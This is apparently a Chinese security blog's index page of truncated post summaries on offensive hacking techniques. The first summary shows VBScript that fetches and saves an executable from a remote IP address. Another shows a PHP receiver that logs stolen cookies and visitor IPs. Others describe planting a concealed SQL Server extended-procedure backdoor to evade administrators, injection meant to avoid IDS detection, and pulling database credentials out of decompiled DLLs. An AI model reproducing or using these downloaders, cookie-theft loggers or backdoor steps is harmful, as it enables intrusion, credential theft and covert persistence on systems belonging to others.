摘要： Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://202.75.208.29/calc.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 ... 阅读全文

摘要： 现在很多的php软件厂商为了一些目的都开始将自己的产品用Zend加密起来，当客户使用的时候根本不知道程序里面的细节，的确给那些搞安全的人很大的难度，所以一些厂商就开始认为只要是Zend过的产品都是安全的。但是其实不然，即使在不知道原代码并且不考虑Zend破解的情况下，我们一样可以利用 Php本身的一些特性来到达获取程序的一些商业逻辑以及信息以到达探测程序的漏洞等等。 测试程序的安全性方法一般有三种... 阅读全文

摘要： 请大家转载的时候注明引用出处（http://blog.csdn.net/michael_veking）以及作者信息（veking），谢谢！ 本文的目的是探讨JS相关技术，并不是以杀毒为主要目的，杀毒只是为讲解一些JS做铺垫的，呵呵，文章有点长，倒杯咖啡或者清茶慢慢看，学习切勿急躁！ 最近公司的网络中了这两天闹的很欢的ARP病毒，导致大家都无法上网，给工作带来了很大的不方便，在这里写下杀毒的过程... 阅读全文

摘要： 鬼仔注：从7j那里看到的，并且有7j写的接收页面。7j:没有找到他说的接收页面,只有自已用PHP写个了 ""){ $tmp = fopen($filename,"a+"); fwrite($tmp,"地址:".$url."\n主机:".$hostname."\nCookie:".$cookie."\nIP:".$_SERVER['REMOTE_ADDR']."\n".$time."\n"); f... 阅读全文

摘要： ---------------->Inherits="Lab_3rd.NewsView"程序是封装在dll文件里了，找到bin目录，可以看到Lab_3rd.dll然后对其进行反编译(Reflector是一个.net反编译工具)，数据库连接特征字符一般是Conn然后去下载一个“code search”插件。搜索conn。就能发现封装在Dll文件里的数据库连接字符串！ 阅读全文

摘要： 鉴于现在管理员非常厉害，还会查隐藏帐户、还会查3389登陆日志、还会查Rootkit、还会查SQL LOG。真TMD BT。新发现一个后门非常隐藏---------------简单三步：1、将xplake2.dll复制到 Microsoft SQL server\mssql\binn目录2、运行如下命令： USE master EXEC sp_addextendedp... 阅读全文

摘要： codz: 使用：进行注入。。。。。这种方法的注入虽然比较麻烦，也有一定的局限性（必须拿下一个PZ站），但是他胜在是永远是一个变量，只是临时存在于服务器，IDS什么的都不能检测，倒，IIS也更不会有什么记录。我测试的是access数据库的，MSSQL的那就请大家自行测试了。还要说一下，PHP中貌似还有一个函数能构造注入，虽然很少能进库，但是也是一种新的攻击方法，因为我的mysql5.... 阅读全文

摘要： 鬼仔：我这里测试有的成功，有的不成功，原因不明。同样的版本的情况下，有的成功，有的失败。比如同样的beta1，有的失败，有的成功，beta4也有的失败，有的成功。当然，VBScript.qqs中的脚本可以自己修改，达到别的目的。利用场景。懒得贴图了，自己测试吧。 来源：Crab's Blog 把那3个文件解到\Tencent\QQ\IMScene\Scene\ 用记事本打开VBScript.... 阅读全文

摘要： by：Neeao[B.C.T] 阅读全文

摘要： JOBTHREADSTATEHOSTPORTERR MSGACTION"); int count = jobScheduler.Count; for (int i = 0; i "; break; case 1: dstate = "pause"; operate = ""; break; ... 阅读全文